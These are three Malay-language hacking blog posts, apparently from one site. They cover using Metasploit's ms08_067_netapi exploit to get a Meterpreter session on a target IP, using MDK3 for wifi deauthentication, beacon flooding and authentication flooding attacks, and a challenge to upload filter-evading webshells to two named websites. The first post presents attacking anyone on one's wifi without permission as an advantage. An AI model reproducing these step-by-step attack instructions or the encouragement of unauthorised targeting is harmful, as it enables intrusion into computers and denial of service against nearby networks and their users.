Assalamualaikum semua,

th3bAdh pernah membaca artikel tentang metasploit di OMG! Hacker yang dikarang oleh Abg Saki, dan macam ada sesuatu yang tertinggal pada artikel tersebut, Jadi tutorial pada kali akan menyambung sedikit tentang Metasploit, bagi yang belum baca sila dapatkan kan kefahaman terlebih dahulu atau boleh rujuk disini,(karangan Abg Saki)

Seperti yang anda tahu, Metasploit adalah salah satu tool yang sangat popular pada semua peringkat tidak kira lah dari tahap Professional sehingga ke tahap Script Kiddie kerana ianya menggunakan baris perintah yang mudah dan menjimat kan masa bagi penguji keselamatan.

Jadi apakah yang dimaksudkkan Remote Exploit yerk?

Remote Exploit dari pemahaman aku, bermaksud mengawal atau menghantar exploit secara jauh  (kalau salah betulkan..hehehe)

Kelebihan nya

 

1. Tidak perlu mendapatkan akses/kebenaran untuk menggunakan komputer itu (bermakna kita boleh target sapa-sapa je terutama orang yang menggunakan wifi kita…heheh

2.Boleh hack komputer luar dari LAN kita (aku tak pernah berjaya lagi hehehe..)

Kekurangan nya

 

1. Tidak semua komputer boleh dihack (bergantung kepada vuln yang terdapat di dalam komputer tersebut, antara yang paling sukar tembus Windows 7, tapi tak semestinya tak boleh tembus)

2. Firewall sekarang menyebabkan sukar untuk tembus,

3. Perisian anti virus menyekat dan melaporkan ianya sebagai Trojan

Jadi anda sudah faham sedikit apa yang dimaksudkan dengan Remote Exploit. Sekiranya masih lagi tidak faham, th3bAdh berasakan anda tidak lagi boleh meneruskan dengan bacaaan seterusya, kasi faham dahulu yerk.

Bagi remote exploit ini, ianya sedikit rumit bagi permulaan, kerana tidak semua komputer mempunyai vurln/zero day , jadi bagi tujuaan pembelajaran, th3bAdh syorkan anda bermula dengan menguji Windows XP SP1 atau Windows Server 2003 kerana ianya ianya terdapat perlbagai bug. th3bAdh tidak galakkan untuk menguji dengan Windows 7 kerana sistem keselamatan yang baik menyebabkan ianya sukar digodam.

Macam mana nak mula

buka terminal dan taip  

msfconsole

tunggu sehingga ia selesai load 

kemudian, taipkan

use windows/smb/ms08_067_netapi

taip

set RHOST 192.168.1.13

penerangan –

RHOST – adalah target IP mangsa

kemudian

 

exploit

sekiranya ianya seperti dibawah, bermakna anda telah berjaya.

 Meterpreter session 1 started ….Binggo!

Jadi, itu adalah serba sedikit tentang Remote Exploit, sekiranya anda tidak berjaya, pastikan anda memulakan pengujian pada Windows XP SP1 terlebih dahulu. Nantikan tutorial backtrack akan datang.

Views: 1

Salam dan salam sejahtera kepada pembaca OMG! Hacker yang budiman,

th3bAdh adalah seorang penulis baru kat sini, jadi sekarang mahu biasakan dahulu disini,
gaya penulisan, artikel mesti segar dan mengikut format, itu kata abang taiko kat sini, apa -apa pun kita ikut sahaja..(jangan marah yerk)

Tentu anda terfikirkan apa itu stress testing, kalau dalam bahasa melayu ujian tekanan,oh,ujian tekanan,pelik bunyinya,stress testing adalah salah satu tools yang terdapat di dalam backtrack 5. Saya sangat pasti,sekiranya anda telah menggodek backtrack pasti akan menjumpainya, tetapi pasti tertanya-tanya apa fungsi yang terdapat di dalam itu.

Artikel kali ini akan membincangkan tools yang terdapat di kategori WLAN Stress Testting iaitu MDK3.Perlu di ingatkan bahawa, tools ini boleh menyebabkan kerosakan pada mana perkakas yang menggunakan wifi,jadi gunakan dengan berhati-hati
dan macam biasa lah, mesti dapat izin dari mana-mana pihak untuk menguji nya

Saya pun tak berapa pasti apa maksud MDK3 ni,tapi yang saya pernah jumpa nama pemainan itu, namanya MDK atau Murder Death Kill..Saya rasa boleh lah kita samakannya kerana tool ini sangat bertepatan dengan  fungsi tool ni

th3 bAdh pasti sesiapa yang telah menggunakan tools di dalam Backtrack 5 untuk memecah WEP, dengan menggunakan backtrack5,anda akan dapat lihat banyak tools yang berkaitan Wireless Hacking antaranya Mdk3,apa kegunaanya?? th3 bAdh akan menunjukkan sedikit priview dan bagi sedikit pemahaman tentang Mdk3,

Perkara yang Mdk3 boleh lakukan:

1. Ia boleh memutuskan internet pengguna dikawasan berhampiran anda dengan melakukan ddos tanpa perlu masuk ke dalam Accses Point tersebut (erm,bermakna kesemua orang akan terputus?)teruk gitu,apa kegunaanya kalau semua orang sudah terputus? jangan risau,terdapat baris perintah yang membuatkan accses point yang dipilih sahaja yang tidak terputus sambungannya

2. Ianya juga boleh membanjiri AP(acces point/atau wifi berhampiri anda)dengan authentication requests. payah nak terang yang ini..macam mana yerk nak terangkan. Ia akan membuat kan router anda menjadi gila dengan membuat penghataran data palsu dengan menggunakan MAC address yang palsu, jadi apa kesanya? router akan dipenuhi client(pengguna) palsu dan menjadi penuh,jadi orang lain tidak boleh memasuki wifi tersebut

3. Ianya boleh membuat AP/wifi palsu dengan banyak sekali,ini boleh menyebabkan orang lain keliru.Ni contoh:

4. Boleh menghentikan aliran trafik(bermakna, tiada terus wifi tersebut)

sebenernya banyak lagi yang boleh dilakukan dengan backtrack ini, tetapi th3 bAdh fikir mungkin itu telah mencukupi

Membebel je panjang-panjang, mana nak mula ni,??Okey lah kita mulakan dengan membuka terminal terlebih dahulu dan hidupkan monitoring mode card anda. Ini adalah baris perintah bagaimana untuk melakukanya

Pergi ke Backtrack>Stress Testing>WLAN Stress testing>Mdk3

taipkan

mdk3 mon0 d

penerangan :

contoh pilihan lain : 

b   – Beacon Flood Mode akan membuat wifi palsu dengan banyak sekali

a   –  DDos Router, terlalu banyak client akan menyebabkan “freeze” atau reset semula pada sesetengah wifi

.

Okey,itu sahaja, kalau nak lebih lagi, anda boleh la godek sendiri. th3 bAdh nak korang semua faham betul-betul penggunaan nya, bukan sekadar guna sahaja

Views: 0

Assalamualaikum dan salam sejahtera kepada para pembaca OMG!Hacker.com
Kepada para hacker a.k.a penggodam bermula dari peringkat script kiddies sehingga ke yang paling proffesional disini ada cabaran untuk anda.

Apa yang anda perlu lakukan hanya godam web:
http://www.apasaja.biz/
atau
http://www.apasaja.my/

Bagi sesiapa sahaja yang berjaya menggodam laman tersebut tidak akan dilaporkan kepada polis dan juga tidak akan dikenakan tindakan undang-undang, kerana laman tersebut telah dibangunkan untuk menguji keselamatan. Btw aku ada dengar cerita bahawa jika anda berjaya deface laman tersebut, tuan punya laman tersebut akan membayar sebanyak RM50!!(buat duit raya).

Anda boleh log masuk dengan ID: test dan PASSWORD: test123 . Hanya satu vulnerability yang diberikan secara terang-terangan, iaitu anda dibenarkan upload file php pada laman tersebut. Apa lagi korang bolehlah upload webshell. Tapi tidak semudah itu, laman tersebut sudah dilengkapi dengan sistem keselamatan dan penapisan, jadi kebanyakkan webshell diupload akan mengeluarkan ERROR 403 dan rekod IP anda akan dilog oleh tuan punya laman tersebut, tapi jgn risau dia tidak akan apa-apa kan anda. Jadi tidak perlulah bersusah payah nak hide IP korang tuh. ERROR tersebut membawa makna anda cuba untuk memuat naik bahan terlarang. Oleh sebab itu anda perlulah kreatif untuk menembusi sistem keselamatan tersebut.

P/S: setakat encrypt webshell base64 baik bungkus lar lap top, hahahaha,
Selamat Mencuba.

Gambar Hilangkan Stress:

Views: 1